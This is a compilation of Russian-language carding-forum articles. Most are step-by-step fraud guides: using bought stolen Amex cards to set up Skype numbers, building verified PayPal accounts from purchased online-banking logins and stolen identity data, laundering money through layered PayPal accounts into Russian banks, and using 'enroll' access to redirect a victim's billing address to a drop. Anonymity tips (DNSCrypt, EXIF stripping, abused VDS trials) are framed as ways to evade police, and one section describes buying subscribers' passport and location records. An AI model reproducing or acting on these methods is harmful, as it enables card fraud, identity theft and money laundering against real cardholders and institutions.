Так же, в ряде случаев, возможно прохождение DNS запросов через VPN в незашифрованном виде, что сводит наши усилия остаться анонимными практически на нет. Так как даже при использование сверх надёжного поставщика VPN, ваш провайдер сможет предоставить по запросу компетентных органов ваши DNS-запросы и восстановить картину ваших движений в интернете.
Поэтому необходимость шифровать весь DNS-трафик очевидна. Как от своего провайдера, так и на всякий случай от своего поставщика VPNа. Для этих целей мы будем использовать небольшую бесплатную утилиту DNSCrypt. Она надежно зашифрует наш DNS-трафик алгоритмом Curve25519.
Помимо вышеописанных плюсов, использование этой программы даст нам защиту от атак типа man-in-the-middle, что тоже вовсе не лишнеё.
Рассмотрим установку DNSCrypt на Windows 7. Так же DNSCrypt можно установить на *nix и *bsd системы, android, ios и т.д. Но поскольку большинство сидит на винде, то и писать будем для них.
Остальные при необходимости вполне могут загуглить.
Первое что нужно сделать это скачать сам DNSCrypt. Сделать это лучше с оффициального сайта проекта. Прямая ссылка: http://download.dnscrypt.org/dnscrypt-proxy/, так же если нет желания заморачиваться с работой программы в командной строке нужно скачать оффициальное GUI приложение: https://github.com/Noxwizard/dnscrypt-winclient
Распаковываем основное приложение в удобную для нас дерикторию. Например C:\Program Files (x86)\dnscrypt-proxy. Теперь нам нужно распаковать exe файл GUI приложения. Если по ссылке был скачан архив целиком, то нужный нам файл лежит в \dnscrypt-winclient-master\binaries\Release. Копируем его в папку bin, в нашем случае C:\Program Files (x86)\dnscrypt-proxy\bin.
Теперь можно приступить к несложной настройке. Запускаем dnscrypt-winclient.exe с правами администратора (1):
Устанавливаем службу DNSCrypt нажимая кнопку Install (2) и в соседней вкладке Config выбираем нужный нам dns-сервер (3). Сделать это можно сверившись с табличкой по ссылкеhttps://github.com/jedisct1/dnscrypt-proxy/blob/master/dnscrypt-resolvers.csv. Здесь можно посмотреть параметры серверов, в частности такой важный для нас, как ведение на логов на конкретном сервере.
Теперь нужно сконфигурировать свое подключение к интернету. Идем в Панель управления -> Сеть и Интернет -> Сетевые подключения. Выбираем свое соединение, через которое у нас приходит интернет, открываем его свойства и открываем свойства IPv4 как на скрине (4). Вводим в предпочитаемый DNS сервер адрес локалхоста (5), то есть наш локальный ip - 127.0.0.1. Отныне служба DNSCrypt будет пересылать все DNS-запросы через себя на выбранные сервера.
Далее идем на сайт whoer.net и смотрим какой DNS сервер нам покажет данный сервис (5). Если видим сервер DNSCrypt значит все настроено правильно и работает. Новая высота в нашей
непробиваемой анонимности достигнута ;)
Если решите удалить DNSCrypt, то запустите его exe и вместо кнопки Install в скрине (1) будет кнопка Uninstall, нажмите её. После этого в свойствах своего подключения выберите автоматическое получение DNS-сервера (4). Хотя ума не приложу зачем такую нужную и важную штуку удалять.


Личный дедик за 15 центов + изменение языка Windows 7

У многих хостинг провайдоров есть услуга "Бесплатный тестовый период VDS" (виртуальный дедик).
Список VPS-хостинговСписок VPS-хостингов, предоставляющих бесплатный тестовый период до месяца
Timeweb (3 дня)
VPS.ua (30 дней, тарифы VZ-256 и X-384)
Rusonyx (30 дней, тариф с 1 Гб RAM)
Inferno Solutions (до 14 дней, нужно писать заявку в биллинге)
1Gb.ru (10 дней)
Siteko.net (10 дней)
Logol (до 10 дней в зависимости от тарифа)
AdminVPS.ru (7 дней, нужно писать тикет с заявкой)
Agava (7 дней, тариф с 512 Мб RAM)
CoolVDS (до 7 дней, нужно писать заявку)
Fozzy.com (7 дней, тариф с 1 Гб RAM, нужно писать заявку)
Goodhoster.net (7 дней, могут попросить скан паспорта)
ipserver.su (7 дней)
it-mcp.ru (7 дней)
Makecloud.ru (7 дней, тариф с 2 Гб RAM, нужно писать письмо с заявкой)
Nthost.ru (7 дней)
Sim-networks.com (7 дней, тарифы до 512 Мб RAM)
Simplyway.net (7 дней, нужно сообщить поддержке номер заказа)
Smartape.ru (7 дней)
Sprinthost (7 дней)
TheHost.com.ua (до 7 дней в зависимости от тарифа)
TrueVDS (7 дней)
Unihost.com (7 дней, нужно писать письмо с заявкой)
Awax-hosting.ru (5 дней, тарифы до 256 Мб RAM)
Colobridge.net (5 дней)
Just-hosting.ru (5 дней, нужно заплатить 1 цент)
Planetahost.ru (5 дней, только Windows VPS)
Shneider-host.ru (5 дней, нужно писать в техподдержку)
ihc.ru (3 дня)
interserver.ru (3 дня)На примере timeweb:
- заходим на timeweb.com, вкладка VDS
- в конфигураторе VDS выбираем ОС "Windows 7 Ultimate" (!) на тестовом периоде после регистрации
ОС не меняют, смена языка доступна только на версии Ultimate
*Память и диски не важно, на тестовом периоде предоставляют 15Гб Hdd и 512Мб оперативки
- жмем "Заказать"
- заполняем ФИО, mail, имя пользователя, соглашаемся с правилами и жмем купить
- принимаем благодарности, идем проверять почту
Spoiler: ПисьмоЗДРАВСТВУЙТЕ
Ваш аккаунт для управления VDS серверами успешно создан и подготовлен к работе.
Для входа в панель управления, пожалуйста, используйте следующие данные:
Панель управления: https://cp.timeweb.ru
Логин: *******
Пароль: ******
Пожалуйста, будьте внимательны и храните учетные данные своего аккаунта в недоступном для посторонних лиц (и возможных вредоносных программ) месте.
Документация по услуге VDS доступна по адресу: http://help.timeweb.ru/vds/
Благодарим вас за выбор Timeweb!*на следующем шаге нам нужен номер для приема смс
Для ленивых (не реклама!) [email protected] обращался к этому человеку (6 руб за активацию)- заходим в панель управления, подтверждаем номер, активируем тестовый период
- включаем сервер, начинается установка
*у них какой-то баг на винде, установка зависает на 99%. Из панели пишу в сапорт, что установка повисла, передают админу, он поднимает сервер. линукс разворачивался автоматом

Изменение языка интерфейса Winodws 7 VDS
После успешной установки ОС получаем следующеё письмо
ЗДРАВСТВУЙТЕ.
Операционная система windows-7-ultimate успешно установлена на сервере "New".
Для увеличения производительности сервера необходимо установить драйвера, используя следующую инструкцию:
http://help.timeweb.ru/vds/windows/375/
Для доступа к VDS, используйте следующие реквизиты:
IP сервера: ххх.ххх.ххх.ххх
Имя пользователя: Admin
Пароль: *******

Получить дополнительную информацию по поводу созданной VDS вы сможете, связавшись с нами по адресу [email protected].
Документация по услуге VDS доступна по адресу: http://help.timeweb.ru/vds/По данному адресу подключаемся к нашей VDS через RDP
Для передачи данных на сервер рекомендую использовать ftp
Зачем ftp?VDS отключали после того как я начал качать с меги и торрента и прислали уведомление

Мы сожалеём, но тестовый период для вашего VDS сервера был отменен по решению модератора хостинга.
Наиболеё вероятные причины:
- Активность VDS позволяет нам быть уверенными в том, что после истечение тестового периода сервер не будет оплачен.
Вы можете воспользоваться нашим хостингом на платной основе. Для оплаты VDS сервера свяжитесь с поддержкой хостинга.

- устанавливаем ftp сервер на VDS
Установка ftp сервера https://filezilla-project.org/download.php?type=server
Внизу страницы: > Show additional download options > FileZilla_Server-0_9_48.exe (recommended)
- при установке все параметры оставляем стандартные
- выбираем адрес сервера 127.0.0.1, порт оставляем стандартный, задаем пароль
- добавляем пользователя
- Edit => Users => Add => Вводим имя пользователя
- На закладке "General", ставим галочку напротив Password и задаем пароль для подключения
- Переходим на закладку "Shared folders" и добавляем папку, которую будет видеть пользователь при
подключении
- задаем права на папку "Read", "Write"- устанавливаем ftp клиента на свою машину
Устанавливаем ftp клиента https://filezilla-project.org/download.php?type=client
Внизу страницы: > Show additional download options > FileZilla_3.9.0.6_win32-setup.exe (recommended)
- при установке все параметры оставляем стандартные
- в поле "host" вводим адрес для подключение к VPS (IP сервера)
- username, password - те что писали при добавлении пользователя
- нажимаем "quickconnect"
- переносим нужное нам ПО на VDS (левая часть - наш компьютер, правая - VDS)- устанавливаем

Языковой пакет English постоянная ссылка для Windows 7 64x
- запускаем скаченный файл, ждем завершения установки
- пуск=>панель управления=>часы, язык, регион=>язык и региональные стандарты
- форматы => формат => Английский (США)
- расположение => США
- языки и клавиатура => изменить клавиатуру => по умолчанию выбираем США, русский удаляем
- языки и клавиатура => язык интерфейса выбираем english
- дополнительно => изменить язык системы => английский (сша)

Если хотим полностью удалить русский язык (не знаю насколько это обязательно)
- пуск => в строке поиска набираем "regedit"
- в редактореё реёстра изменяем следующие параметры:
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Nls\Language]
"InstallLanguage"="0409"
"Default"="0409"
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Nls\Locale]
"(Default)"="00000409"
Удаляем ключ
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\MUI\UILanguages\ru-RU
для перезагрузки, пуск => в строке поиска набираем "shutdown -r -t 0"
После перезагрузки следов от русского языка не останется)

Ставим Proxifier, меняем время и вперед! Не забываем подключаться через vpn!
Profit! имеем персональный дедик на 3 дня (выключают не предупреждая, видимо автоматом)
Так же есть забугорный хостинг провайдеры предоставляющие VDS бесплатно.
Например elastichosts.com
Для тестирования VDS в течении 30 дней необходимо ввести данные карты (обещают не списывать средства) вводил данные не валидной карты, не прошло)

P.S: Windows ведет лог подклюений по RDP, кто помнит где добавьте. Хотя не думаю, что это актуально, хостинг провайдер 99% ведет лог на своем оборудовании.


Делаем Skype аккаунт с прямым номером

Итак. Процедура стандартная как и при любом вбиве:
- Покупаем СС Amex USA
- Находим носок\туннель под город\штат кард холдера
- При желании чекаем на рискскор (но не обязательно)
- Проверяем на Whoer.net в блеке носок или нет
- Выставляем часовой пояс под штат (именно часовой пояс, а не просто время переводим)
- Регистрируем почту под кард ходера. Я регаю каждый раз на mail.com (многие спрашивают, можно ли использовать купленные почты типа fi[email protected]. Тут на Ваше усмотрение, кто-то пользуется такими почтами, я лично под скайп всегда регаю, тем болеё на mail.com на это требуется меньше минуты времени)

Если все все готово, приступаем к делу!
- Идём на skype.com и жмем на Sign In
- Нажимаем на Create an account
- Заполняем все данные, номер телефона холдера с измененными несколькими цифрами
- Указываем желаемый логин\пароль, оставляем галку на By email, заполняем капчу и идем Далее
- Аккаунт зарегистрирован. Теперь откроем кредит. Жмем слева на Discover credit
Соглашаемся с условиями поставив галочку и жмем Далее.
Если не получилось, есть 2 варианта:
1) Начать весь процесс заного с новой СС, предварительно почистив систему клинером
2) Просто взять новую СС под этот же штат и вбить её тут же (в этом случае акк могут залочить, либо он проживет не долго)

Далее жмем на Stored payment details. Далее на следующем шаге жмем удалить напротив нашей карты и соглашаемся с этим действием. Все карта отвязана от аккаунта.
- Выбераем нужную Вам страну и жмём купить.
- Подписка куплена

Если Вы дружите с разговорным английским, то без проблем запишите голосовое сообщение на автоатветчик.
Запускаем скайп и дем в меню Tools -> Options -> Calls -> Voice Messages. Жмем кнопку запись и трындим в микрофон.
В противном случае обратитесь к прозвонщикам.
Лично я баланс на аккаунте не делаю. Я сразу покупаю нужный мне номер, и карту не отвязываю.
Так же максимально заполняю все данные в профиле холдера (Город, штат и т.п.) и ставлю аватарку в самом скайпе.
Одна СС = один аккаунт! не вбивайте эту СС больше ни куда! Оставьте её для пополнения этого же аккаунта.
Мой рекорд в плане живучести аккаунта был равер 5 мес.

Всем спасибо за внимание!


EXIF как угроза безопасности

Всем привет, хочу поднять тему, которую в поиске не нашел. Да и посмотрев форум, понял что
немногие в курсе (или просто не заморачиваются). А зря. И так начнем.

Как нам говорит википедия, EXIF (англ. Exchangeable Image File Format) — стандарт, позволяющий добавлять к изображениям и прочим медиафайлам дополнительную информацию (метаданные),
комментирующую этот файл, описывающий условия и способы его получения, авторство и т. п.
Правильные теги EXIF необходимо добавлять в отрисовки сканом сс, паспортов, ибо естественно что нормальный шоп забородит заказ если в EXIF скана будет прописан фотошоп, а не сканер. Это я
думаю всем ясно. Но, я бы хотел обсудить тему EXIF с другой стороны – выкладывание фото стаффа и вообще любых других фото, сделанных самими.
И так, почему же наши фотки с EXIF– это очень серьезная угроза личной безопасности и деанонимизации? На форуме много статей, посвященных анонимности в сети: настройки
виртуальных машин, шифрований, впнов и прочих нужных вещей. Но все это может пойти прахом из-за одной выложенной фотоки.

Заранеё скажу, что рассмотрю пару примеров фотографий, выложенных на этом форуме. Так что если кто-то узнает в примерах свои фото – мужики, срочно исправляйтесь! ;)

Что же может узнать любой человек, имеющий доступ к вашей фотографии:
1. В лучшем случаи нечего, только визуальную информацию (вид из окна например или другие деанонимизирующие факторы);
2. В случае по хуже он может узнать марку, модель, версию прошивки вашего устройства (что не совсем хорошо, ведь в случае «Пи» это может быть дополнительное косвенной уликой у товарищей в погонах);
3. ну и в самом-самом худшем случае можно будет оставить свои геоданные (и, к сожалению, таких фотографий встречается достаточно много как на нашем форуме, так и на других проектах).

Теперь рассмотрим как посмотреть EXIF данные своей или чужой фотографии. Так как, по моим наблюдениям, здесь большинство сидят на винде, то и рассматривать будем на её примере.
Первый, и самый простой способ, это сохранить фото к себе на комп и открыть свойства:
Мы видим марку, модель и другие данные устройства на камеру которого была сделана фотография.
Если бы у этого файла были прописаны геоданные, мы бы тоже смогли их увидеть в окне свойств.
Думаю тут комментарии излишни.
Перейдем ко второму способу просмотра EXIF данных. Это различные сторонние программы (EXIF
Pilot, EXIF Viewer и прочеё). На этом способе я не буду останавливаться, каждый может загуглить и
найти удобную для себя программу. Скажу лишь, что по-моему, такими программами есть смысл
пользоваться для изменения метатегов, а не просмотра.

Ну и третий, самый удобный для меня способ, это скачать дополнение для своего браузера. Например
для firefox я использую эддон exif viewer. Маленький, русифицированный, и в целом очень удобный.
Вот пример его использования:
Стоит отметить, что этот эддон как и программы из способа 2 показывают гораздо больше метаданных, чем просто свойства изображения из 1 спопоба. И вот, прокрутив вниз список тегов, где так же указана марку, модель, и даже время создания фото. Далее мы видим самый плохой расклад – геоданные. Они представляют из себя GPS координаты, даже высота над уровнем моря есть, можно с известной погрешностью прикинуть этаж. В эддоне сразу есть ссылки на карты, нажав на них вас
перекинет на карту с указанными координатами.
Вот, в принципе, наш кардер и деанонимизирован. Если под вас копают, то это – радушное приглашение к себе домой.
Резонный вопрос – как бороться? Ответ очевиден – стирать все метаданные у графических файлов, которые вы планируете опубликовать.
Делается это либо стандартными средствами (на скрине первого способа внизу мы можете увидеть надпись «удаление свойств и личной информации»), однако есть риск оставить часть данных и так же допустить учтечку.
Ещё вариант, это воспользоваться сторонними программами на вроде FileMind QuickFix и т.д. (гугль подскажет). Тут к сожалению так же есть шанс оставить какие-либо теги, так как такие программы читают и стирают только известные им теги метаданных. Хотя все распространенные данные вроде марки, модели и геоданных они безусловно потрут.
Ну и самый правильный способ, это пересоздать файл средствами Adobe Photoshop. Для этого открываем нужный файл, заходим в File -> Save for Web…

Выбираем Metadata: None, нажимаем Save…, получаем чистый файл и наслаждаемся ещё одной закрытой брешью в нашей непробиваемой анонимности.

Прошу прощения если тема уже поднималась, просто я реально удивлен тому, как люди беспечно относятся к своей безопасности, занимаясь совсем не белыми делами. Я знаю реальные случаи у
людей в смежных движениях, когда одна фотография становилась началом эффекта домино и ребята садились.
Если вам понравилась моя статейка, могу иногда писать подобный материал ещё. Выложил в закрытый раздел, чтобы услышать ваши мысли, в принципе можно перенести и в открытый, так как никакой приватной инфы тут, разумеётся нет

Мгновенная почта на прием писем:
www.mailnesia.com вписали логин - создали почту. Ящику можно придумать псевдоним поверх имени. Минусы - не придумывайте сильно банальные названия, а так можно поискать и по чужим ящикам пошариться.
www.mailforspam.com вот ещё одна такая мгновенная почта
10minutemail.net хороший сервис. Почту сразу автоматом дают. Для пробных рег.


Делаем verified PayPal аккаунт aka саморег

Для начала я рекомендую ознакомиться со статьей FAQ PayPal из соседней темы.

Подготовительный этап
Итак, для работы мы можем использовать соксы либо дедики. При этом заказывайте чистый дедик под палку, а в случае соксов - чекайте сокс на блэклист в пейпале. Для этого есть удобная программулина -> https://mega.co.nz/#!5xIV1QBY!UDHnbSUO0QAQ5MuknPYn2SyyGwYosPtBH4_RflAQfGk
Далее вы чистите и настраиваете систему под будущего холдера. IP, часовой пояс, язык.
Интересный вопрос, если мы работаем с китайской палкой, она будет ругаться если у нас винда английская? Учитывая уровень параноидальности пейпала в последнеё время, не удивлюсь если это так.
Отдельно хочу отметить, что пейпал ведет себя очень странно, а иногда и вовсе перестает грузить страницы, если вы пользуетесь user-agent спуферами (User Agent Switcher например).
Не забываем проверяться на http://whoer.net/ перед работой.
Если мы хотим зарегистрировать USA аккаунт, то самый простой способ - с помощью банк аккаунта.
Покупаем интернет банк аккаунт у селлера (опять же из соседней темы полезные контакты).
Входим в личный кабинет америкоса и выдираем всю необходимую инфу о нем. Главное пока не трогайте счета и кредитки.
Из аккаунта нам понадобится Routing number и Account number. Их можно найти на скане чека, он обычно в pdf формате. Эти сканы обычно можно найти в транзакциях.
Примеры:
Account number - 000000112233
Routing number - 122000030

AVS верификация - Address Verification System

По другому проверка подлинности адреса. Существует не только в палке, но и некоторых других системах.
То есть палка проверяет введен ли реальный адрес и реальные данные человека. Работает для США и Великобритании.
Обходиться просто. Мы регистрируем палку на реальные данные, реального человека и реальный адрес.
Данные мы берем из купленных СС или лежащих в паблике, тогда в этом случае нам нужны только данные холдера, но не номер карты.
Другой вариант пробить SSN, DOB, Address холдера банк аккаунта для полной аутентичности или любого другого человека, главное реального, как уже было сказано.

VBA верификация - Virtual Bank Account Verification
Не забываем верифицировать емейл, и начинаем процедуру приклеивания банк акка к палке.
Выбираем тип Checking. Savings никогда не пробовал привязывать. С ним будет работать?

Типы счетов:
1. Checking - Самый распространенный тип аккаунта в банковской системе. Данный тип счета
используется как расчетный.
ˆ Чеки
ˆ К ним обычно привязаны Debit card (Раньше использовали чеки, но т.к. они себя изжили недостатками, сделали замену на пластик)
ˆ Налик (в бранчах)
ˆ EFT (Electronic funds transfers) - электронные переводы (ACH, WIRE и т.п.)
ˆ Direct deposit (Получение зарплаты с места работы)
ˆ SWIFT (Международные банковские переводы)
2. Savings - Данный тип счета является "сбегерательным". Используется в основном для
долгосрочного откладывания сбережний (Высокие проценты, и к пенсии хорошая сумма накопится).
ˆ Чеки
ˆ К ним обычно не привязывают Debit card
ˆ Налик (в бранчах)
ˆ EFT (Electronic funds transfers) - электронные переводы (ACH, WIRE и т.п.)
ˆ Direct deposit (Получение зарплаты с места работы)
ˆ SWIFT (Международные банковские переводы)

Вводим Account и Routing number выдернутые из интернет-банка.
Далее нас палка просит ввести логин и пароль от нашего банк акка (инстант верификация). Таким образом палка автоматом авторизовывает и привязывает счет. Если автоматом привязать не получилось, палка сделает мини-депозит на счет. Пока транзакция отразится в интернет-банке может пройти пару дней. Вводим сумму транзакции в пейпал и вуаля мы имеем Verified пейпал аккаунт, ну или не имеем, тогда все начинаем сначала))

VCC верификация - Virtual Credit Card Verification
Эти карты используются для верификации европейских аккаунтов и для подтверждения юса палок.
Обычно они продаются с небольшими балансами. т.к. Paypal снимает 1.95 долларов и отправляет 4-значный код который мы находим в выписке, и вводим в аккаунте палки для подтверждения.
После ввода кода, наша карта становиться в статусе Confirmed, и мы получаем верифнутый акк для EU.
Так же можно использовать enroll. В таком случае мы можем узнать 4-значный код который придет в выписке по карте, плюс мы можем знать баланс и оплачивать прямо с прикрепленной карты.
Можно прикреплять и простую СС, но в этом случае мы не сможем её подтвердить, но можем так же свободно оплачивать с её баланса.
Самый популярный сервис с VCC - https://www.entropay.com/
Не забываем и про https://qiwi.com/
P.S. Вся инфа актуальна на конец 2020 года. Сейчас палка ведет себя крайне агрессивно, что даже белые пользователи страдают.


Выводим доллары с прикрепленного USA счета в ру банки

Для сей процедуры нам понадобится два российских палкиных аккаунта. Первый как прослойка, который примет на себя весь удар в случае лока, а второй для вывода в ру банк, который по идеё должен прожить чуть дольше.
Первый ру счёт мы верифицируем киви виртуальной картой на левые фио и адрес.
Для второго мы покупаем банковскую карту на darkmoney, они идут со сканами паспортов. Регаем на эти данные палку. Вывод на российский банк занимает 5-7 дней. И не забываем этот аккаунт также верифицировать киви картой, ну или той что вы купили.

Для начала удостоверимся, что в интернет банкинге на checking счете имеются средства. Если нет, то переводим с Savings счета на Checking небольшую сумму (до $200). С юса аккаунта палки делаем перевод на нашу ру прослойку. Первый перевод лучше делать до $200 (не жадничайте).
При попытке оплаты или перевода юса палка все равно попросит добавить карту, при этом не обязательно подтверждая её.
Есть несколько Способов перевода или оплаты денег в системе.
1. С баланса Paypal. Оплата Инстантом, то есть мгновенно.
2. С прикрепленной СС. так же оплата инстантом. Не обязательно с подвтерждением СС
3. С прикрепленного банк. акка. Два варианта.
ˆ Оплата E-Chekom - деньги получателю идут 3-4 рабочих дня.
ˆ Инстант-оплата с банка - возможна только при подтвержденном резервном источнике финансирования, то есть нужно подтвердить прикрепленную СС или VCC. Палка дает нам как бы оплатить в долг, снимает деньги с банк акка, но не ждет 3-4 дня. Такая оплата не всегда возможна.

Итак, если перевод прошёл успешно, дождитесь денег на прослойке и переводите на конечную ру палку. Затем вывод в ру банк.
Палкин антифрод совершенствуется. Поэтому нам приходится постоянно совершенствовать и методы его обхода.
Можно создать сеть таких верифицированных аккаунтов. И выводить баксы по разным цепочкам.
Используя разные способы перевода. Обычный перевод (Send Money) можно заменить на Donate (пожертвование), можно запросить деньги из ру палки с юсы (Request Money) якобы за некую услугу.
Болеё сложный вариант покупать у самого себя на ебеё. Но он же и болеё надежный.
И не забываем давать отлеживаться верифицированным аккаунтам - это продлевает им жизнь.


Автоматизированная система поиска шопов по конкретным параметрам

Привет коллеги!
Сегодня расскажу вам как проще и удобнеё искать шопы в глобальной сети "ИНТЕРНЕТ"
Для работы нам понадобятся шопы которые имеют низкий pagerank (PR) соответственно менеё задрочены и без проблем шлют на посредников или дропов.

Бюджетный вариант:
1. Ищем любой бесплатный "Парсер поисковиков". Парсер - программа для сбора информации, в нашем случае сайтов.
2. Вбиваем критерий который нужен. Не нужные, дублирующие удаляем!
3. Сохраняем все оставшиеся сайты на рабочий стол (в каждом "парсере" есть кнопка import)
4. Скачиваем "PaRaMeter" http://www.cleverstat.com/ru/page-rank-software.htm можно любой другой удобный вам.
5. Вставляем туда список из парсера
6. Чекаем!

Платный вариант

1. Купить платную версию парсера на сайте изготовителя или же заказать парсер под свои критерии.
2. В платных версиях все настроено автоматом, и сам поиск и чек на PR.

Вот в прицепи и все, всем спасибо за внимание!
Статья будет дополняться т.к написана на скорую руку!
P.S. Сам я пользуюсь бесплатной версией.
О, это о чем ты вчера говорил?
Попробовал на парсере Butterfly http://bibyte.net/content/butterfly-40-beta-2. Супер тема-времени экономит вагон. 15 минут и 70 сайтов с пиар < 3


Телефонная связь, её минусы

Все пишу по своему опыту. В основном великая тройка БИЛАЙН, МЕГАФОН, МТС.
Попробую разложить все по частям.
1. Абонент и конфиденциальность информации о нем.
Как нам найти абонента, если у нас есть его номер телефона, мы можем очень легко купить все паспортные данные на него(ФИО Дата Прописка) + по всем сетям проверить какие сим карты на него ещё оформлены. Если у нас есть данные мы хотим найти человека, опять же связь нам поможет пробиваем по всем сетям какие номера он регистрировал на свой паспорт.
2. Абонент его существование в нашем мире. Мы можем узнать интересы абонента, заведения которые он посещает. Для этого есть детализация БС с картой передвижения. Не кому не секрет когда мы ходим с телефоном он постоянно подключается к разным вышкам сетей (это уже следы за тобой).
Как это будет выглядеть, Будет очень большой эксель файл, в котором будут все ваши звонки и каждые минут 15-20 отмечаться места вашего мобильного телефона. Погрешность точек отметок вашей связи - (100-1000 метров). Всегда можно пробить реальное местоположение абонента погрешность таже.
3. Абонент и конфиденциальность его партнеров. Приведу пример. Допустим у нас есть небольшой бизнес в которым есть еще конкуренты. Мы хотим стать выше конкурентов задавить их. Забрать его клиентов к себе. Что нам для этого нужно. Про анализировать всех конкурентов создать, понять условия за чего к ним обращаются клиенты. Создать у себя наиболеё приятные условия чем у них.
Дальше дело техники ( связь выручает) Все знают про спам на телефон. Собираем все контакты связи конкурентов, делаем на все номера детализации (желательно пол года). У нас целая отборная база со всеми клиентами вашего бизнеса. Дальше все в ваших руках как её использовать.

4. Смс её анонимность?. Смс переписки достаются тоже, писали вы хоть день назад хоть пол года назад. Представьте сим карта была зарегистрирована на вас. Мы оказались в крайне опасной ситуации, отправили какую то важную очень информацию смской которую должен знать второй абонент и всё. А другой человек копает на вас. Допустим сделал смс детализацию + плюс карту передвижение. Информация смс у человека+ место в котором вы находились, как добирались до туда и т.д. ( какой след большой для дальнейших раскопок.)
5. Слежка за абонентом. Прослушка (МИФ или РЕАЛЬНОСТЬ) Трудно ли вас поставить на прослушку мобильного телефона? НЕТ. Если надо поставят и сделают все по бумагам. Не чего против не сможешь сказать. Появилась щас у самих такая возможность. Можем слушать любого абонента. Кстате ещё один миф прослушка при выключеном телефона, ДА ЭТО РЕАЛЬНО!Спросите где свобода человека её с каждым годом крепят. Только говорят свободные народ, на самом деле все при присмотре и если надо найти найдут.

Будут вопросы спрашивайте общие минусы назвал вроде все.


Вывод с paypal на WMZ

Способ связан с онлайн игрой.
Не скрытое содержимое:
1) Нам понадобится рабочий аккаунт paypal c баллансом.
2) Рабочий кошелёк webmoney (WMZ).
3) Интернет, компьютер и руки.
-1: Регистрируем аккаунт по ссылке My Lands.
-2: Расса героев и сервер не важен.
-3: Жмём сундук.
-4: Далее жмякаем Достать ЧЖ.
-5: Выбираем способ оплаты paypal.
-6: Выбираем тариф B.
-7: Вводим данные от кошелька paypal.
-8: После того как пришёл жемчуг жмём купить подписку.
-9: После покупки подписки снова покапаем жемчуг на сумму которую вы хотите вывести.
-10: Далее переходим снова на My Lands, жмём финансовый счёт.
-11: Жмём Вывод средств.
-12: Вводим в строке *Сумма вывода* колличество вашего жемчуга.
-13: В строке Номер кошелькая WMZ вводим номер вашего колешька. Жмём вывести, в течении суток на ваш кошелёк будут зачисленны деньги.

P.S.: Чёрный жемчуг — это буквально самая настоящая свободно конвертируемая валюта игры, которую можно вводить и ВЫВОДИТЬ из игры My Lands на свой кошелёк WebMoney.
Курс обмена Чёрного жемчуга примерно 1 $ за 100 ЧЖ.


Делаем Enroll

Что такое Enroll?
Это, грубо говоря, инструмент управления счетом по средством интернета, с помощью которого можно осуществлять различные операции, оплачивать счета(Pay Bill), просматривать информацию о балансе и всех расходах по кредитной\дебетовой карте в режиме онлайн.
Данную услугу предоставляют банки-эмитеты своим клиентам.

Для чего нам нужен Enroll?
В основном Enroll используется для заказа товара в онлайн-магазинах. Во всех банках которые встречаются у селлеров enroll’a есть функция смены Billing address’a – собственно это нам и нужно.
Зачем? – шопов, которые шлют на различные billing – shipping адреса, значительно меньше, чем тех которые без проблем шлют на billing address. Если у вас есть шоп который шлет на различный billing- shipping адрес, он вряд ли вышлет вам дорогой товар, а если вы закажете дорогой стафф на биллинг адрес, шансов что шоп вышлет значительно больше. Меняем в enroll’e billing address на адрес дропа, и через некоторое время можно делать заказ в магазине)(2-3 бизнес дня) При оформлении ордера уже указываем адрес дропа как Billing Address и в Shipping Address соответственно тоже пишем адрес дропа.
Так же с помощью энролла можно верифицировать минидепозиты. При регистрации в некоторых платёжных систем требуется такая верификация. С баланса карты снимается одна\две суммы от 1 до 3$, и предлагают ввести точные суммы на сайте платёжки. Посмотреть сколько списалось с карты можно в statement’e.

Где взять Enroll?
Советую прочитать форум, всё очень расписано грамотно.


Миллионы доменов бесплатно

Тема будет интересна SEO’шникам, дорвейщикам, спамерам любых категорий и всем кто использует домены в работе.
Предлагаю Вам схему и программное обеспечение для получения болеё тысячи доменных имён, бесплатно.
1. Многие домены трастовые
2. Каждый из Вас сможет получить больше тысячи доменов
3. Абсолютно бесплатно

Это небольшой пример, работы ПО.
Что касается самой темы
а) Тема не умрет
б) В паблике нету
в) Доменов хватит на всех
г) Уязвимость? Да.
Больше нечего раскрывать не буду… а пока что, немножко математики
Средняя стоимость домена – 100 руб.
100 штук доменов - 10.000 руб
1000 штук доменов обойдется в 100.000 руб.


Триада управления

Предисловие:
Собственно думал - зачем такая сложная и не профильная тема на этом борде, ведь она по большей части относится к отношениям общества и государства, но пришел к выводу, что она применима в контексте закрытого общества в том числе - как для развития, так и для самоорганизации.
По сути, мы с вами живем в существующем мире финансово-экономических отношениях с множествами дыр, в которые мы частенько тянем свои "грязные ноги" в условиях неоднородности систем электронной безопасности различных регионов мира и на этом делаем свой куш.
Тема создана для понимания условий: зарождения кардинга как явления, понимания стартового положения этой сферы, текущего положения и перспективы развития направления. Для многих это ответ - почему запад был всегда впереди (в контексте управления). Ведь мир, который мы с вами знаем меняется на глазах и мы не должны отставать от тенденций его развития. На самом деле это большая и философская тема, есть над чем порассуждать.

Собственно тема:
На бытовом уровне каждый знаком с таким явлением, как неэффективные решения. Вы применяете массу усилий для достижения цели, но цель не приближается, а даже удаляется от вас. С другой стороны есть масса примеров в жизни каждого, когда незначительное с виду решение коренным образом меняет всю картину ситуации и позволяет достичь цели почти без усилий. Задумайтесь, почему так происходит? Почему иногда титанические усилия не приносят пользы, а скореё вред, а «случайные» действия позволяют легко обойти проблемы. Потому, что принятая на вооружение классическая методология управления событиями не работает в реальности, и есть только весьма примитивное приближение к ней. Не важно, какие задачи вы собираетесь решать изменять - общественный строй, создавать партию, решать глобальные экономические проблемы или просто думаете, как вам обустроить вашу личную жизнь. Без реально работающей методологии решить текущие и перспективные проблемы не возможно, как и невозможно успешно достигать поставленных задач.
Развитие практики современных методов управления, как на обще-социальном, так и локально групповом уровне, необходимое условие стабильного и прогнозируемого развития любой социально-общественной системы, как глобально системного так и локально личностного уровня. В нынешнюю эпоху общество и индивидуум сталкиваются с эффективными механизмами воздействия на свою структуру и жизнь приводящеё порой даже к развитию явлений прямо противоречащим задачам и целям данного общества и слагающих его индивидов. Каким образом, задачи управления могут решаться столь эффективно даже при наличии очевидного дисбаланса интересов? Эта статья первая из цикла статей «Новые реалии методологи управления» в котором мы ставим перед собой задачу раскрытия методов управления с иной системой точки зрения, существенно отличной от классической.
